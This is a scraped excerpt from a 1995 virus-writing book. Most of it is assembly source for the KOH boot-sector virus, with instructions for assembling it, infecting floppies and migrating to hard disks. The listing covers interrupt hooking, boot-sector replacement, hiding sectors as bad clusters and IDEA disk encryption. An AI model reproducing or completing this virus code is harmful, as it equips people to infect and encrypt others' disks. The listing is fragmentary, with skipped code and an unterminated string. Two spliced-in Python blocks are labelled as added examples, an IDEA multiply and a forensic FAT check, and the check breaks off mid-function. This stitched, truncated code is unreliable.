
The Giant Black Book of Computer Viruses, part 10 (doc)


DOCUMENT INFORMATION

Basic information

Title: The Giant Black Book of Computer Viruses
Institution: American Eagle Publications
Subject: Computer Viruses
Type: book
Year published: 1995
City: unknown
Format:
Pages: 67
Size: 2.16 MB


Contents


Page 1

Legal Warning

As of the date of this writing, the KOH virus is illegal to export in executable form from the US. If you create an executable of it from the code in this book, and export it, you could be subject to immediate confiscation of all your property without recourse, and possibly also to jail after a trial. There is, however, no restriction (at present) against exporting this code in printed form, as in this book.

The KOH Source

KOH consists of several modules which must all be present on the disk to assemble it properly. KOH.ASM is the main file, which includes the loader, the boot sector, the interrupt handlers, hard disk encryptor, etc. KOHIDEA.ASM is an include file that contains the code for the IDEA algorithm. FATMAN.ASM is the FAT manager routines. These differ slightly from the FATMAN.ASM originally listed with the BBS virus because the FAT is sometimes encrypted. The PASS.ASM include file contains the pass phrase entry routines, and RAND.ASM contains the pseudo-random number generator.

To build the KOH virus, just assemble KOH.ASM, preferably using TASM. Then, run the KOH.COM file you produce to infect and encrypt a diskette in the A: drive (or specify B: on the command line if you'd rather use your B: drive). To migrate KOH to the hard disk, just boot from the infected floppy. KOH will ask if you want it to migrate to the hard disk; just answer yes.

When you assemble KOH, make sure the code does not overrun the scratchpad buffer where the disk is read into and written from. If you do, it will cause KOH to crash. Since KOH is highly optimized and crunched into the minimum amount of space available to it, an assembler that did not optimize the assembly could cause code to overflow into this buffer, which is located just below the boot sector.

Page 2

The KOH.ASM Source

;Source Listing for the Potassium Hydroxide virus.
; (C) 1995 by The King of Hearts, All rights reserved.
;Licensed to American Eagle Publications, Inc. for use in The Giant Black Book
;of Computer Viruses.
;
;Version 1.00
;  Initial release - beta only
;Version 1.01
;  Upgrade to fix a number of bugs in 1.00, gets rid of casual encryption
;  and encrypts only one partition on disk, not whole disk, instant HD
;  password change.
;Version 1.02
;  Fixes failure of SETUP_HARD on some disks because the INT 41H vector
;  doesn't always point to a proper drive parameter table.
;  Fixes problem with some floppy drives that messes up 2nd FAT table.
;Version 1.03
;  Fixes inability to infect some floppy disks that are almost full but not
;  quite.

;Both of the following should always be odd for this to work right.
BUF_SIZE EQU 9 ;Internal disk buffer size, in sectors
VIR_SIZE EQU 9 ;Virus size, less boot sector, in sectors

VIRUS SEGMENT BYTE

        mov [HPP],OFFSET FDHPP ;floppy password
        call MASTER_PASS ;create a new password
        mov bx,80H ;check parameter

Page 3

        add BYTE PTR [SUCCESS_MSG+17],al
        jmp SHORT PAR2
PAR1:   mov dl,0
PAR2:   mov ax,0201H
        mov bx,OFFSET DUMMY_BUF

ABORT_MSG   DB 'Initial load failed aborting.$'
SUCCESS_MSG DB 'Load successful. A: now encrypted with KOH.$' ;offset 17 is the drive letter patched above
STRING_LIST DW OFFSET SURE
            DW OFFSET ENCRYPT_QUERY1
            DW OFFSET PW_EXPLAIN
            DW OFFSET STOP_MSG
            DW OFFSET FD_PWASK

Page 4

MEMSIZE     DW 640 ;size of memory installed, in KB

WELCOME_MSG DB 'Potassium Hydroxide (KOH) Version 1.03 Loader by the King of Hearts',0DH,0AH
            DB '(C) 1995 American Eagle Publications, Inc. All rights reserved.',0DH,0AH,0AH
            DB 'This loader will migrate the KOH encryption system to a floppy disk of your',0DH,0AH
            DB 'choice (A or B) as specified on the command line. After encrypting, you must',0DH,0AH
            DB 'boot from that floppy to activate the decryption, or to migrate to a hard disk.',0DH,0AH
            DB 'This program uses the IDEA algorithm (implementation not developed in the US)',0DH,0AH
            DB 'in conjunction with a pass phrase up to 128 bytes long. Floppies and hard disks',0DH,0AH
            DB 'have their own separate pass phrases. The floppy uses it directly. The hard',0DH,0AH
            DB 'disk is encrypted with a 16 byte random number, which is decrypted with its',0DH,0AH
            DB 'pass phrase. Three commands can be activated when KOH

LOCAL_STACK:
FDHPP       DB 16 dup (0) ;floppy disk hashed pass phrase
HDKEY       DB 16 dup (0) ;hard disk key, used to encrypt/decrypt sectors
HDHPP       DB 16 dup (0) ;hard disk hashed pass phrase, to encrypt HDKEY

Page 5

IDEAVIR: ;A label for the beginning of the virus

;*******************************************************************************
;* INTERRUPT 13H HANDLER *
;*******************************************************************************

;This routine must intercept reads and writes to the floppy disk and encrypt/
;decrypt them as necessary.

OLD_13H DD ? ;Old interrupt 13H vector goes here
OLD_9   DD ? ;Old interrupt 9 vector goes here

;The following calls the original rom bios INT 13. DO_INT13 just calls it once.
;DO_INT13E does error handling, calling it once, and if an error, doing a
;disk reset, and then calling it again, returning c if there is an error.
DO_INT13E:
        mov BYTE PTR cs:[MOTOR_FLAG],1
I13R:   jmp DWORD PTR cs:[OLD_13H]

;*******************************************************************************
;This section of code handles all attempts to access the Disk BIOS Function 3,
;(Write). If an attempt is made to write any sectors except the boot sector,
;this function must encrypt the data to write, write it, and then decrypt
;everything again. If the boot sector is written, it must not be encrypted!
WRITE_FUNCTION:
        mov BYTE PTR cs:[ACTIVE],1
        mov cs:[CURR_DISK],dl ;set this with current disk no
        mov cs:[SECS_READ],al

Page 6

        jz WF2
        call DECRYPT_DATA
WF2:    popf
WF3:    mov BYTE PTR cs:[ACTIVE],0
        retf 2 ;return and pop flags off stack

;*******************************************************************************
;This section of code handles all attempts to access the Disk BIOS Function 2,
;(Read). If an attempt is made to read any sectors except the boot sector,
;this function must allow the read to proceed normally, and then decrypt
;everything read except the boot sector.

DOREAD1:call IS_ENCRYPTED ;is disk encrypted?
        jz DONE_DECRYPT ;no, don't try to decrypt it
        call DECRYPT_DATA
        jmp WF3 ;return and pop flags off stack

;This routine determines if CURR_DISK is encrypted or not. It returns with
;Z set if it isn't encrypted, and reset if it is. It is assumed that dl
;contains the current disk # on entry. No registers are changed.
IS_ENCRYPTED:
        cmp dl,80H ;is it a hard drive?
        jnc IE_HD ;yes, check it specially

Page 7

        pop cx
        ret
IE_HD:  jnz IEZ ;drive other than c: ?
        push ax
        mov al,cs:[HD_CRYPT] ;see if HD is encrypted
        or al,al ;and set flag properly

;This routine decrypts using IDEA. On entry, ax, es:bx, cx and dx must be set
;up just like they are for the INT 13. All registers are preserved on this
;call. This routine does not change the stack.
DECRYPT_DATA:
        mov BYTE PTR cs:[cfb_dc_idea],0FFH
        jmp SHORT CRYPT_DATA

;This routine encrypts using IDEA. On entry, ax, es:bx, cx and dx must be set
;up just like they are for the INT 13. All registers are preserved on this
;call. This routine does not change the stack.

Page 8

ED1:    or dh,dh ;is it head 0?
        jnz ED2 ;nope, go encrypt
        cmp cx,1 ;is it track 0, sector 1?
        jz ED3 ;nope, go encrypt

Page 9

;This routine increments cx/dx to the next sector. On floppies, it just
;increments cl, the sector number. On HD's, it must also handle head and track
;number. This includes the AMI extension to handle more than 1024 cylinders.
;Returns nc if it is past the last sector on disk.

;This routine does all that is needed to infect a floppy disk. It determines
;whether the disk is infected, and if so, attempts an infect.

Page 10

        mov ax,WORD PTR [BS_HEADS]
        mov [HPP],OFFSET FDHPP ;use floppy password
        call SHOULD_INFECT ;should we infect the floppy?
        jnz IF_END
        mov cl,dl ;get current disk number
        mov al,0FEH
        rol al,cl ;assume we're not encrypted now,
        and [CRYPT_FLAG],al ;so reset the crypt flag
        mov ax,0201H ;move boot sector into BUF
        mov bx,OFFSET SCRATCHBUF
        mov cx,1
        mov dh,0
        int 40H ;read boot sector
        jnc INF2 ;read was ok
        cmp ah,6 ;change flag set if ah=6
        jnz INF1
        mov [CHANGE_FLAG],ah ;so save it here
INF1:   mov ax,0201H
        int 40H ;try again
        mov al,BYTE PTR [SCRATCHBUF+15H] ;get boot sector ID
        xor al,BYTE PTR [SCRATCHBUF+200H] ;xor with FAT ID
        jnz INF5 ;not same, encrypted, so skip
        cmp WORD PTR [SCRATCHBUF+201H],0FFFFH ;better be FFFF
        jnz INF5 ;else encrypted
        cmp [FD_INFECT],1 ;should we infect??
        jz INF55 ;nope, don't encrypt
        call INIT_FAT_MANAGER ;set up disk parameters
        call ENCRYPT_FLOPPY ;and encrypt the disk
        jc IF_END ;if error, exit and don't infect
        mov ax,0201H ;re-load boot sec after encrypt
        mov cx,1
        jz IF_END
        call IS_VBS ;is viral boot sector there?
        jnz INF6 ;nope, go infect it
        jmp SHORT IF_END ;else exit
INF6:   call INIT_FAT_MANAGER ;initialize disk parameters
        call MOVE_VIRUS_FLOPPY ;and infect, if possible
IF_END: pop ax
        mov WORD PTR [BS_SECTORS_ON_DISK],ax

Page 11

        pop si
        pop di
        pop es
        pop ds
        ret ;return with flags set properly

;Set the CRYPT_FLAG for the current disk.

;This routine determines whether we should infect now. It signals time to
;infect only if the drive motor is off. If the caller should proceed with
;infection, the Z flag is reset on return. On entry, dl should contain the
;drive number to check, and dl should not be changed by this routine.
        mov cl,dl ;cl=drive number
        shr al,cl ;put motor status for current drive in bit 0 of al
        and al,1 ;mask all other bits

;This routine encrypts the floppy disk in preparation for infecting it.
;The drive number is put in [CURR_DISK] before this is called. This uses the
;interrupt 13H handler to do the encryption.
ENCRYPT_FLOPPY:
        mov cx,2 ;int 13 parameters
        xor dh,dh ;skip encrypting boot sector!
        mov dl,[CURR_DISK]
        mov [FIRST],ch ;set first=0
        mov bx,OFFSET SCRATCHBUF
EFLP:   cmp BYTE PTR [CURR_DISK],80H
        jne EFL0
        call DISP_STATUS
EFL0:   mov al,BUF_SIZE
        mov ah,BYTE PTR [SECS_PER_TRACK]
        push cx

Page 12

        call DO_INT13E ;read sector without decryption
        jc EF_RDERR ;exit on error
        jc EF_WRERR ;and keep trying
        mov BYTE PTR [FIRST],1
EFL2:   mov al,[SECS_READ]
EFL3:   call NEXT_SEC
        jnc EF_EX
        dec al
        jnz EFL3
        jmp EFLP
EF_ERR: stc ;set carry on error
EF_EX:  ret ;and exit now

;Handle read/write errors on disks here. Above is multiple sector read/write,
;but the following does it sector by sector, whenever an error occurs in a
;read or write on a sector.
EF_WRERR:
        cmp BYTE PTR [FIRST],0
        jz EF_ERR ;first write attempt? write protected
        or al,al ;make sure nothing was written to disk

Page 13

        mov si,OFFSET CYL_LABEL

Page 14

;This routine puts the virus on the floppy disk. It has no safeguards to
;prevent infecting an already infected disk. That must occur at a higher level.
;Also, it does not encrypt the floppy disk. That occurs elsewhere. On entry,
;[CURR_DISK] must contain the drive number to act upon.
MOVE_VIRUS_FLOPPY:
        mov bx,VIR_SIZE+1 ;number of sectors requested
        call FIND_FREE ;find free space on disk
        jnc INF01 ;exit now if no space
        call DO_INT13E ;read original boot sector
        mov si,OFFSET BOOT_START ;build floppy viral bs
        mov di,OFFSET SCRATCHBUF + 512 ;temp buf for floppy viral bs
        mov cx,256

Page 15

        rep movsb ;floppies too
        pop cx
        call CLUST_TO_ABSOLUTE ;set cx,dx up with trk, sec, hd info
        mov WORD PTR [VIRCX - OFFSET BOOT_START + OFFSET SCRATCHBUF + 512],cx
        mov BYTE PTR [VIRDH - OFFSET BOOT_START + OFFSET SCRATCHBUF + 512],dh ;save in viral bs
        mov BYTE PTR [CHANGE_FLAG - OFFSET BOOT_START + OFFSET SCRATCHBUF + 512],0
        mov dl,[CURR_DISK]
        mov bx,OFFSET IDEAVIR
        mov si,VIR_SIZE+1 ;read/write VIR_SIZE+1 sectors
MVF2:   push si
        mov ax,0301H ;read/write 1 sector
        call DO_INT13E ;call BIOS to read it
        pop si
        jc IFEX ;exit if it fails
        add bx,512 ;increment read buffer
        inc cl ;get ready to do next sector
        cmp cl,BYTE PTR [SECS_PER_TRACK] ;last sector on track?
        jbe MVF3 ;no, continue
        mov cl,1 ;yes, set sector=1
        inc dh ;try next side
        cmp dh,2 ;last side?
        jb MVF3 ;no, continue
        xor dh,dh ;yes, set side=0
        inc ch ;and increment track count
MVF3:   dec si

;Infect Hard Disk Drive AL with this virus. This involves the following steps:
;A) Read the present boot sector. B) Copy it to Track 0, Head 0, Sector 7.
;C) Copy the disk partition info into the viral boot sector in memory. D) Copy
;the viral boot sector to Track 0, Head 0, Sector 1. E) Copy the IDEAVIR
;routines to Track 0, Head 0, Sector 2, 5 sectors total.

Page 16

        or ax,ax ;this better not be 0 or no room
        jz IH01 ;else ok to infect
        mov ax,301H
        call DO_INT13E
        mov di,OFFSET PARTPRE
        mov si,OFFSET SCRATCHBUF + 1ADH
        mov cx,51H ;copy partition table
        rep movsb ;to new boot sector too!
        mov bx,OFFSET PART - 10H
IH1:    add bx,10H ;set up partition parameters
        cmp BYTE PTR [bx],80H

Page 17

;This routine is the highest level routine handling hard disk encryption. It
;asks permission to encrypt and then does it to one or two drives, depending
;on how many are present. It uses a separate hard disk password to do the
;encrypting, and this is separate from the floppy disk password entered when
;the drive was originally infected. Return with Z set if successful.
ENCRYPT_HARD_DISK:
        call CLEAR_SCREEN
        mov si,OFFSET ENCRYPT_QUERY1
        call ASK ;ask if one wants hd encrypted
        jnz ASKR
        mov BYTE PTR [HD_CRYPT],2
EHD1:   mov si,OFFSET PW_EXPLAIN

        stosb ;save it for key
        mov ax,0E2EH ;display a '.' to indicate
        int 10H ;program is working right
        cmp di,OFFSET HDKEY + 16
        jnz EHD2 ;loop until 16 bytes done
        push ds ;now hash with low memory
        xor ax,ax ;segment 0, for added randomness
        mov ds,ax
        mov di,OFFSET HDKEY
EHD37:  loop EHD35

Page 18

        mov si,OFFSET STOP_MSG ;tell user to stop
        mov [CURR_DISK],al ;save drive number
        call ENCRYPT_HARD ;and go encrypt it
        xor al,al ;set z for successful returns
EHDR:   ret

;Save floppy disk hashed pass phrase and hard disk key to disk

Page 19

        and al,4 ;is the CTRL down?
        jz I9EXIT ;nope, pass control to bios
        and ah,8 ;is the ALT down?
        jz I9EXIT ;nope, pass control to bios

Page 20

        call DO_INT13E
        jc HUR
        mov si,OFFSET PARTPRE ;update partition table
        mov di,OFFSET SCRATCHBUF + 1ADH ;to current one in viral
        mov cl,51H ;boot sector
        cmp BYTE PTR [HD_CRYPT],0 ;is drive encrypted?
        jz HUR ;no, all done
        mov BYTE PTR [REMOVE],0FFH
        mov [HPP],OFFSET HDKEY
        call EHD_SUBR ;decrypt the hard disk(s)
        mov BYTE PTR [REMOVE],0
HUR:    cld
        mov di,OFFSET INT_13H ;reroute interrupts
        call KILL_INT ;back to old handlers
        mov ax,OFFSET OLD_13H

Page 21

        mov si,OFFSET HD_PWCHASK
        call ASK ;and user wants to change it
        jnz FDPW

        mov al,20H ;reset 8259 controller
        out 20H,al ;for all machines

Page 22

;This routine decodes cyl, hd, sec info in dh/cx in standard BIOS format into
;cx=cylinder, dh=head, dl=sector. Only cx and dx are modified.

Page 23

;Strings for the virus go here
SURE            DB 'Sure you want to uninstall? ',0
ENCRYPT_QUERY1  DB 'KOH-Encrypt your HARD DISK now (please backup first)?
                DB 'Begin pressing keys.',0DH,0AH,0
STOP_MSG        DB 7,7,7,7,'OK, stop. Press ESC to continue.',0DH,0AH,0
FD_PWASK        DB 'Enter the FD PW now.',0DH,0AH,0
HD_PWCHASK      DB 'Do you want to change the HD password? ',0
FD_PWCHASK      DB 'Do you want to change the FD password? ',0
PW_HDEX         DB 'Now enter HD PW.',0DH,0AH,0
HARD_ASK        DB 'KOH 1.01-Migrate to hard drive on this computer (please backup)? ',0
ALL_DONE        DB 'Done. You may continue.',0
NO_ROOM         DB 'No room to migrate to HD!',7,0DH,0AH,0
UPDATE_MSG      DB 'Uninstall old version to update to V1.02! Press any key.',0

                DB 512*BUF_SIZE - 2*PW_LENGTH dup (?)

;These routines share the scratch buffer with disk IO. Be careful!
;PASSWD EQU OFFSET SCRATCHBUF
;PASSVR EQU OFFSET SCRATCHBUF + PW_LENGTH

;*******************************************************************************
;* THIS IS THE REPLACEMENT (VIRAL) BOOT SECTOR *
;*******************************************************************************

Page 24

BS_BYTES_PER_SEC    DW ? ;bytes per sector
BS_SECS_PER_CLUST   DB ? ;sectors per cluster
BS_RESERVED_SECS    DW ? ;reserved sectors at beginning of disk
BS_FATS             DB ? ;copies of fat on disk
BS_DIR_ENTRIES      DW ? ;number of entries in root directory
BS_SECTORS_ON_DISK  DW ? ;total number of sectors on disk
BS_FORMAT_ID        DB ? ;disk format ID
BS_SECS_PER_FAT     DW ? ;number of sectors per FAT
BS_SECS_PER_TRACK   DW ? ;number of sectors per track (one head)
BS_HEADS            DW ? ;number of heads on disk
BS_DBT              DB 25 dup (?)

;The following are the CX and DH values to indicate where the rest of the
;virus is located. These are set by INFECT_FLOPPY, as needed by INT 13H.
VIRCX       DW ?
VIRDH       DB ?
HPP         DW OFFSET FDHPP ;pointer to hashed pass phrase
BSLOC_DH    DB ? ;active boot sec location on hard disk
BSLOC_CX    DW ?

;The following two bytes must remain contiguous!
CHANGE_FLAG DB 0 ;if <> 0, change line was just called
FD_INFECT   DB 0 ;1=automatic floppy infect turned off

;The following two bytes must remain contiguous!
DR_FLAG     DB ? ;drive flag, indicates hard disk boot
HD_CRYPT    DB ? ;Hard disk encryption, 0=OFF, 2=Strong

CRYPT_FLAG  DB ? ;encryption on/off flag for floppies
MOTOR_FLAG  DB ? ;set if motor turned on
REMOVE      DB 0 ;FF=uninstalling, 0=not uninstalling
FIRST       DB 0 ;flag to indicate first write failure

;The following two bytes must remain contiguous
ACTIVE      DB 1 ;this is 1 whenever in an int 13 or
                 ;int 9, and during boot up, helps avoid
                 ;Ctrl-Alt-KOH when could cause trouble
FORMAT_FLAG DB 0 ;flag set when an int 13, fctn 5 is
                 ;called, overrides motor to infect
                 ;next read

FIRST_SEC   DB 0 ;first cyl, hd, sec of
FIRST_HEAD  DB 0 ;active partition
FIRST_CYL   DW 0
LAST_SEC    DB 0 ;last cyl, hd, sec of
LAST_HEAD   DB 0 ;active partition

Page 25

        shl ax,cl ;convert KBytes into a segment
        sub ax,7E0H ;subtract enough so this code
        mov es,ax ;will have the right offset to
        sub [MEMSIZE],(VIR_SIZE+BUF_SIZE+2)/2 ;go memory resident in high ram
GO_RELOC:
        mov si,OFFSET BOOT_START ;set up ds:si and es:di in order
        mov di,si ;to relocate this code
        mov cx,256 ;to high memory
        rep movsw ;and go move this sector
        push es
        mov ax,OFFSET RELOC
        push ax ;push new far @RELOC onto stack
        retf ;and go there with retf
RELOC:  ;now we're in high memory
        push es ;so let's install the virus
        pop ds
        mov bx,OFFSET IDEAVIR ;set up buffer to read virus
        mov dl,[DR_FLAG]

        jc LOAD1 ;try again if it fails
        add bx,512 ;increment read buffer
        inc cl ;get ready to do next sector
        cmp cl,BYTE PTR [BS_SECS_PER_TRACK] ;last sector on track?
        jbe LOAD2 ;no, continue
        mov cl,1 ;yes, set sector=1
        inc dh ;try next side
        cmp dh,BYTE PTR [BS_HEADS] ;last side?
        jb LOAD2 ;no, continue
        xor dh,dh ;yes, set side=0
        inc ch ;and increment track count
LOAD2:  dec si
        jnz LOAD1
MOVE_OLD_BS:
        xor ax,ax ;now move old boot sector into
        mov es,ax ;low memory
        mov si,OFFSET SCRATCHBUF ;at 0000:7C00
        mov di,OFFSET BOOT_START
        mov cx,1ADH
        rep movsb
        add si,OFFSET BOOT_START - OFFSET SCRATCHBUF
        mov cl,53H ;move viral bs partition table
        rep movsb ;into original bs
        call INSTALL_INT_HANDLERS ;install int 9 and 13H handlers

FLOPPY_DISK: ;if loading from a floppy drive,
        call IS_HARD_THERE ;see if a hard disk exists here
        jz DONE ;no hard disk, all done booting
        mov ax,0201H
        mov bx,OFFSET SCRATCHBUF ;read real partition sector

Page 26

        mov dx,80H
        call DO_INT13E
        mov si,OFFSET SCRATCHBUF + 1AEH
HDBOOT: add si,10H ;find active bs and save its loc
        mov ax,[si] ;so it doesn't get encrypted
        cmp al,80H

        jmp SHORT DONE ;yes, all done booting
HDB2:   call INFECT_HARD ;else go infect hard drive(s)
DONE:   mov bx,OFFSET HPP
        mov [bx],OFFSET FDHPP ;assume a floppy PW for now
        cmp [DR_FLAG],80H ;check hard disk encryption
        jnz DONE4
        mov [bx],OFFSET HDHPP
        cmp [HD_CRYPT],0
        jnz DONE4
        call ENCRYPT_HARD_DISK ;if not encrypted, ask to do it!
        jz SHORT DONE5 ;encryption successful, done
        mov [HPP],OFFSET FDHPP
DONE4:  call DECRYP_PASS ;get decryption password
        cmp [HPP],OFFSET FDHPP ;did we get floppy password?
        jz DONE5 ;yes, that's it for now
        mov ax,0201H ;no, read FDHPP from disk
        mov bx,OFFSET SCRATCHBUF

;This routine determines if a hard drive C: exists, and returns NZ if it does,
;Z if it does not. To save space above, the fact that this routine sets cx=0

Page 27

        pop ds
        or al,al ;and see if al=0 (no drives)
        ret

;*******************************************************************************
;Determine whether the boot sector in SCRATCHBUF is the viral boot sector.
;Returns Z if it is, NZ if not. It simply compares the BS_ID field with that
;from the virus. Returns C if you have the viral boot sector, but an earlier
;version that needs to be updated.
IS_VBS:
        mov di,OFFSET BS_ID ;set up for a compare
        mov si,OFFSET SCRATCHBUF+3

PARTPRE:DB 11H dup (0) ;added info for XTs
PART:   DB 40H dup (0) ;partition table goes here

        ORG 7DFEH
        DB 55H,0AAH ;boot sector ID goes here
ENDCODE: ;label for the end of boot sec

        ENDS VIRUS
        END START

The KOHIDEA.ASM Source

;INTERNATIONAL DATA ENCRYPTION ALGORITHM, OPTIMIZED FOR SPEED.
;THIS CODE DESIGNED, WRITTEN AND TESTED IN THE BEAUTIFUL COUNTRY OF MEXICO
;BY THE KING OF HEARTS.

;MUL(X,Y) = X*Y MOD 10001H
;THE FOLLOWING ROUTINE MULTIPLIES X AND Y MODULO 10001H, AND PLACES THE RESULT
;IN AX UPON RETURN. X IS PASSED IN AX, Y IN BX. THIS MUST BE FAST SINCE IT IS
;CALLED LOTS AND LOTS.
_MUL    PROC NEAR
        OR BX,BX
        JZ MUL3
        OR AX,AX
        JZ MUL2
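The _MUL routine above computes IDEA's multiplication modulo 10001H (65537) under the convention that the 16-bit word 0 stands for 65536, which is why the listing begins by testing each operand for zero. The Python below is an added example, not code from the book or from KOH: a reference multiply, the low-word-minus-high-word shortcut that the assembly's fast path relies on after the zero tests, and the modular inverse IDEA needs when it derives decryption subkeys, all cross-checked against each other.

```python
import random

MOD = 0x10001  # 65537 is prime, so the nonzero residues form a multiplicative group.
# IDEA convention: the 16-bit word 0 encodes the residue 65536 (== -1 mod 65537).


def _decode(w):
    """Map a 16-bit word to its residue mod 65537 (0 stands for 65536)."""
    return 65536 if w == 0 else w


def _encode(r):
    """Map a residue in 1..65536 back to a 16-bit word."""
    return 0 if r == 65536 else r


def mul_ref(x, y):
    """Straightforward definition of MUL(X,Y) = X*Y MOD 10001H."""
    return _encode((_decode(x) * _decode(y)) % MOD)


def mul_fast(x, y):
    """The branch structure of the KOH _MUL routine, in Python.

    Zero operands are handled first (what the OR BX,BX / OR AX,AX tests do):
    0 means -1, so the product is -other == 65537 - other. Otherwise the 32-bit
    product p = hi*65536 + lo satisfies p == lo - hi (mod 65537) because
    65536 == -1; when the subtraction borrows, adding 1 corrects for it.
    """
    if x == 0:
        return (MOD - y) & 0xFFFF
    if y == 0:
        return (MOD - x) & 0xFFFF
    p = x * y
    lo, hi = p & 0xFFFF, p >> 16
    return (lo - hi + (1 if lo < hi else 0)) & 0xFFFF


def mul_inv(x):
    """Multiplicative inverse via Fermat (x^(p-2) mod p); IDEA uses it to turn
    encryption subkeys into decryption subkeys."""
    return _encode(pow(_decode(x), MOD - 2, MOD))


def cross_check(samples=20000, seed=1):
    """True if mul_fast agrees with mul_ref on the 0/65536 edge cases and on
    a seeded random sample of 16-bit operand pairs."""
    rng = random.Random(seed)
    pairs = [(0, 0), (0, 1), (1, 0), (0, 0xFFFF), (0xFFFF, 0xFFFF), (2, 0x8001)]
    pairs += [(rng.randrange(0x10000), rng.randrange(0x10000)) for _ in range(samples)]
    return all(mul_fast(a, b) == mul_ref(a, b) for a, b in pairs)


if __name__ == "__main__":
    print(mul_fast(0, 0), mul_fast(2, 0x8001), mul_inv(3), cross_check())
```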

Page 28

;COMPUTE IDEA ENCRYPTION SUBKEYS Z
INITKEY_IDEA PROC NEAR

Page 29

;THE IDEA CIPHER ITSELF - THIS MUST BE HIGHLY OPTIMIZED
CIPHER_IDEA PROC NEAR
        PUSH BP ;WE USE BP INTERNALLY, NOT NORMAL C CALL
        MOV SI,OFFSET _Z
        MOV DI,ROUNDS ;DI USED AS A COUNTER FOR DO LOOP
DOLP:   PUSH AX ;X1, X2, X3, X4 IN REGISTERS HERE
        PUSH BX

Page 30

;VOID IDEASEC(BYTEPTR BUF); ENCRYPTS/DECRYPTS A 512 BYTE BUFFER
IDEASEC PROC NEAR
IS0:    MOV AX,IDEABLOCKSIZE
IS1:    DEC BX ;CHUNKSIZE>0?
        JZ ISEX ;NOPE, DONE
        CALL CIPHER_IDEA ;CIPHER_IDEA(IV_IDEA,TEMP,Z)
        MOV DI,OFFSET _TEMP
        STOSW
        MOV AX,BX

Page 31

        MOV DI,OFFSET IV ;DI=IV
        MOV CX,IDEABLOCKSIZE / 2 ;CX=COUNT
        REP MOVSW ;DO *IV++=*BUF++ WHILE (--COUNT);
        PUSH DS ;SWITCH DS AND ES
        MOV SI,65 ;BX=COUNT
IS3:    DEC SI ;CHUNKSIZE>0?
        JZ ISEX ;NOPE, DONE

Page 32

        MOV DI,OFFSET IV ;DI=IV
        MOV CX,IDEABLOCKSIZE / 2 ;CX=COUNT
        REP MOVSW ;DO *IV++=*BUF++ WHILE (--COUNT);
        PUSH DS ;SWITCH DS AND ES

The FATMAN.ASM Source

;12 Bit File Attribute Table manipulation routines. These routines only
;require a one sector buffer for the FAT, no matter how big it is.

;The following data area must be in this order. It is an image of the data
;stored in the boot sector.
MAX_CLUST       DW ? ;maximum cluster number
SECS_PER_CLUST  DB ? ;sectors per cluster
RESERVED_SECS   DW ? ;reserved sectors at beginning of disk
FATS            DB ? ;copies of fat on disk
DIR_ENTRIES     DW ? ;number of entries in root directory
SECTORS_ON_DISK DW ? ;total number of sectors on disk
FORMAT_ID       DB ? ;disk format ID
SECS_PER_FAT    DW ? ;number of sectors per FAT
SECS_PER_TRACK  DW ? ;number of sectors per track (one head)
HEADS           DW ? ;number of heads on disk

;The following data is not in the boot sector. It is initialized by
CURR_DISK       DB ? ;current disk drive

;This routine is passed the number of contiguous free sectors desired in bx,
;and it attempts to locate them on the disk. If it can, it returns the FAT
;entry number in cx, and the C flag reset. If there aren't that many contiguous
;free sectors available, it returns with C set.

Page 33

        or ax,ax ;is entry zero?
        jnz FFL2 ;no, go reset sector counter
        add dl,[SECS_PER_CLUST] ;else increment sector counter
        adc dh,0
        jmp SHORT FFL3
FFL2:   xor dx,dx ;reset sector counter to zero
FFL3:   cmp dx,bx ;do we have enough sectors now?
        jnc FFL4 ;yes, finish up
        inc cx ;else check another cluster
        cmp cx,[MAX_CLUST] ;unless we're at the maximum allowed
        jnz FFL1 ;not max, do another
FFL4:   cmp dx,bx ;do we have enough sectors
        jc FFEX ;no, exit with C flag set
FFL5:   mov al,[SECS_PER_CLUST] ;yes, now adjust cx to point to start
        xor ah,ah

;This routine marks cx sectors as bad, starting at cluster dx. It does so
;only with the FAT sector currently in memory, and the marking is done only in
;memory. The FAT must be written to disk using UPDATE_FAT_SECTOR to make
;the marking effective.

;This routine marks the single cluster specified in dx as bad. Marking is done
;only in memory. It assumes the proper sector is loaded in memory. It will not
;work properly to mark a cluster which crosses a sector boundary in the FAT.
MARK_CLUST_BAD:
        push dx
        mov cx,dx
        call GET_FAT_OFFSET ;put FAT offset in bx
        mov ax,bx
        mov si,OFFSET SCRATCHBUF ;point to disk buffer
        and bx,1FFH ;get offset in currently loaded sector
        pop cx ;get fat sector number now
        mov al,cl ;see if even or odd
        shr al,1 ;put low bit in c flag
        mov ax,[bx+si] ;get fat entry before branching
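Two pieces of the listing translate directly into a forensic check on a floppy image: the INFECT_FLOPPY test (Page 10) that a disk is unencrypted only if the media descriptor at boot-sector offset 15H equals the first FAT byte and the next two bytes are FFFF (the boot sector is never encrypted, so a mismatch means the data area was transformed or is corrupt), and the FATMAN routines above that hide sectors by marking clusters bad, which leave a contiguous run of bad clusters in an otherwise clean FAT. The Python below is an added example, not part of the book's code; it builds a constructed FAT12 image (names such as make_floppy_image and mark_clusters_bad are this example's own), runs both checks, and includes a constructed mutation that mimics MARK_CLUST_BAD so the scan has something to find.

```python
import struct

# Offsets of the BPB fields this code needs, and the FAT12 bad-cluster marker
BPS_OFF, RESERVED_OFF, MEDIA_OFF = 0x0B, 0x0E, 0x15
BPB_FMT = "<HBHBHHBH"   # bps, secs/clust, reserved, fats, root entries, total, media, secs/FAT
BAD_CLUSTER = 0xFF7


def make_floppy_image(media=0xF0, bps=512, reserved=1, sectors=2880, fat_secs=9):
    """Constructed 1.44 MB FAT12 image: a plausible BPB and two empty FATs."""
    img = bytearray(bps * sectors)
    img[0:3] = b"\xEB\x3C\x90"                      # jump over the BPB
    struct.pack_into(BPB_FMT, img, BPS_OFF, bps, 1, reserved, 2, 224, sectors, media, fat_secs)
    struct.pack_into("<HH", img, 0x18, 18, 2)       # sectors per track, heads
    img[510:512] = b"\x55\xAA"
    for copy in range(2):                           # FAT[0]=media, FAT[1..2]=FF FF
        base = (reserved + copy * fat_secs) * bps
        img[base:base + 3] = bytes([media, 0xFF, 0xFF])
    return img


def fat12_entry(fat, n):
    """12-bit entry n: the even/odd split that FATMAN's GET_FAT_OFFSET logic handles."""
    off = n + n // 2
    word = fat[off] | (fat[off + 1] << 8)
    return word >> 4 if n & 1 else word & 0xFFF


def fat_header_check(img):
    """INFECT_FLOPPY's 'already encrypted?' test, run on an image.
    The boot sector is never encrypted, so its media byte must equal FAT byte 0
    and bytes 1-2 must be FF FF; anything else means the data area was
    transformed by an encrypting loader, or is plainly corrupt."""
    if len(img) < 512 or img[510:512] != b"\x55\xAA":
        return False, "no boot sector signature"
    bps, _, reserved = struct.unpack_from("<HBH", img, BPS_OFF)
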